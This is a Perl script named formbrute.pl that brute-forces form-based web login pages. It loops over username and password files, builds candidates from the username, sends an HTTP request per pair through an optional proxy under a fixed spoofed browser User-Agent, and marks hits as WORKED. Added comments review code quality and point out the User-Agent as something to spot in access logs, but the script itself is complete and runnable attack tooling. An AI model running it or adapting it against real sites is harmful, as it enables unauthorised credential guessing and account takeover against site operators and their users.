formbrute.pl

  #!/usr/bin/perl
#
#
# @2002M.eiszner mei@websec.org
# form-based authentication brute forcer
#
# passfile accepts special vars:
# %%UID%% username
# %%UIDREV%% username-reverse
#
########################################

## Main flow (for anyone reading or analysing this script): read one user
## name per line from -u, and for each of them read -p line by line,
## expand %%UID%% / %%UIDREV%% in the candidate, send one HTTP request
## per (user, password) pair, sequentially and back-to-back, with a
## fixed User-Agent, optionally through an http proxy, and report an
## attempt as WORKED when the response is 200 and the -f string is
## absent from the body. No "use warnings": uninitialised values
## (e.g. split on an undef -h) are silently accepted.
$|=1;   ## autoflush STDOUT so each attempt line is printed immediately

use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;

## get options
## ("use vars" is obsolete; "our" declares the same package globals)
##
use vars qw($opt_m $opt_U $opt_u $opt_p $opt_l $opt_w $opt_o $opt_v $opt_f $opt_s $opt_h);
## "p:" is listed twice (harmless). -h is taken by request headers, so
## there is no help flag. The return value of getopts (presumably false
## on an unknown option or a missing argument) is not checked.
getopts("U:m:u:p:l:w:o:p:v:f:s:h:");

## vardecs
## (every value comes straight from the command line; nothing beyond
## the presence check below is validated)
##
my $method = $opt_m || "GET";     ## anything other than "POST" falls through to GET
my $url = $opt_U;
my $userfile = $opt_u;
my $passfile = $opt_p;
my $uservar = $opt_l || "username";
my $passvar = $opt_w || "password";
my $others = $opt_o || "";        ## extra form fields, "a=b&c=d"
my $proxy = $opt_v || "";
my $failure = $opt_f;             ## interpolated unescaped into a regex below
my $logfile = $opt_s;             ## undef when -s is absent
my $header = $opt_h;              ## undef when -h is absent

## hash for postreqs and headerinfos
## (file-scoped; filled inside the loops below and never cleared, so
## keys persist across attempts)
##
my %PARAMS;
my %HEADERS;

## check that
## (a -f value of "0" counts as missing because of Perl truthiness)
##
if (!$url || !$userfile || !$passfile || !$failure)
{
print "\nusage: $0 -U [url]\n\t-m [method ( GET|POST )]\n\t-u [usernameFile]";
print "\n\t-p [passwordFile]\n\t-l [loginVariable]\n\t-w [passVariable]";
print "\n\t-o [otherVariables ( ie: submit=true&login=yes )]";
print "\n\t-v [proxyServer]\n\t-f [failureString]\n\t-s [saveFilename]";
print "\n\t-h [request-headers( ie: Referer:abc&Cookie:ng=omo )]\n\n";
exit 11;
}

## input validation
## (only the scheme is checked; the rest of the URL is taken verbatim,
## minus CR/LF)
##

if ($url !~ /http:\/\//i && $url !~ /https:\/\//i)
{
$url = "http://".$url;
}
$url =~ s/[\n\r]//g;

## create user-agent
## ("new LWP::UserAgent" is indirect-object syntax; LWP::UserAgent->new
## is the unambiguous form. No timeout is set, so LWP's default applies.)
##

my $response;
my $ua = new LWP::UserAgent;
## Fixed User-Agent string (note the missing space after "4.0"). Being
## constant and slightly malformed, it is an easy marker to look for in
## web-server access logs when investigating login-failure bursts.
$ua->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
$ua->proxy('http', $proxy) if($proxy ne '');   ## http scheme only; https is not proxied

## resultfile
## (2-arg open with an interpolated name: the string is parsed for mode
## characters rather than taken literally -- prefer the 3-arg form,
## open my $rf, '>', $logfile. Bareword handle, and the close at the
## bottom is unchecked, so a write error at flush time goes unnoticed.)
if ($logfile ne '')
{
open (RF, "> $logfile") || die "cant open $logfile !?!\n";
}

## userloop
## (same 2-arg open concern as above; the password file is re-opened
## and re-read from disk once per user name)
open (UF, "< $userfile") || die "cant open $userfile !?!\n";

while(<UF>)
{
my $uid = $_;
$uid =~ s/[\n\r]//g;    ## strip CR/LF only; other whitespace is kept

## passloop
open (PF, "< $passfile") || die "cant open $passfile !?!\n";

while(<PF>)
{
my $pwd = $_;
$pwd =~ s/[\n\r]//g;

## check password for specialities
## (expands %%UID%% / %%UIDREV%%; argument order is (uid, pwd) -- the
## sub's own header comment says (pwd,uid). "&special" is the old
## call syntax; special(...) is the preferred form.)
##
$pwd = &special($uid,$pwd);

## fill hash with
## parameters
##
$PARAMS{$passvar} = $pwd;
$PARAMS{$uservar} = $uid;
my @pairs;
my ($key,$val,$k,$v,$si);    ## $key and $val are declared but never used
@pairs = split(/&/,$others);

## fill params hash with
## all possible additional
## params
## (re-split on every attempt although $others never changes; only the
## first two split fields are kept, so a value containing "=" is cut
## at that "=")
##
foreach $si (@pairs)
{
($k,$v) = split(/=/,$si);
$PARAMS{$k} = $v;
}

## check out all the headers
## and fill the HEADERS-hash
## (only the second ":"-separated field is kept as the value, so a
## header value that itself contains ":" is truncated; $header is
## undef when -h was not given)
##
my @hpairs;
$si = $k = $v = "";
@hpairs = split(/&/,$header);

foreach $si (@hpairs)
{
($k,$v) = split(/:/,$si);
$HEADERS{"$k"} = $v;

}

## the request itselve
## due to forms only GET
## and POST make sense
## (POST sends %PARAMS as the form body with %HEADERS as extra header
## pairs. GET builds the query string by plain interpolation -- no
## URL-encoding -- so the credentials sit in the request line and
## therefore in any web-server or proxy access log.)
##

if ($method eq "POST")
{
$response = $ua->request(POST "$url", \%PARAMS, %HEADERS);
}
else
{
my $reqstr = "$url?$uservar=$uid&$passvar=$pwd&$others";
$reqstr =~ s/[\n\r]//g;
$response = $ua->request(GET "$reqstr", %HEADERS);
}

## check the response and
## write into resultfile
## and stdout
## (success = HTTP 200 and the -f string absent from the body. $failure
## is used as a regex, not matched literally, so metacharacters in it
## change its meaning. The /g on a boolean match is a no-op here since
## $page is a fresh variable each iteration. Any 200 page that simply
## lacks the string -- an error or throttling page, say -- is reported
## as WORKED.)
##

my $page = $response->content();
my $code = $response->code();

if ($code eq "200" && $page !~ /$failure/ig)
{
print "$uid:$pwd *** WORKED ***\n";
print RF "$uid:$pwd *** WORKED ***\n" if ($logfile ne '');   ## unchecked print
}
else
{
print "$uid:$pwd ($code)\n";    ## non-200 status, or failure string present
print RF "$uid:$pwd ($code)\n" if ($logfile ne '');
}


} # endpassloop
close (PF);

} # enduserloop

close (UF);
close (RF) if ($logfile ne '');   ## unchecked close on the write handle


### end main begin subs
###
### sub special (pwd,uid)
### returns pwd

sub special
{
    ## Expand the template markers in one password candidate.
    ## Arguments: ($uid, $pwd) -- user name first, candidate second.
    ## %%UID%%    -> the user name as given
    ## %%UIDREV%% -> the user name spelled backwards
    ## Only the first occurrence of each marker is replaced; a candidate
    ## without markers is returned unchanged.
    my ($uid, $pwd) = @_;

    ## plain user name (first occurrence only)
    $pwd =~ s/%%UID%%/$uid/;

    ## reversed user name (first occurrence only); index() avoids a
    ## second regex pass when the marker is absent
    if (index($pwd, '%%UIDREV%%') >= 0)
    {
        my $backwards = scalar reverse $uid;
        $pwd =~ s/%%UIDREV%%/$backwards/;
    }

    return $pwd;
}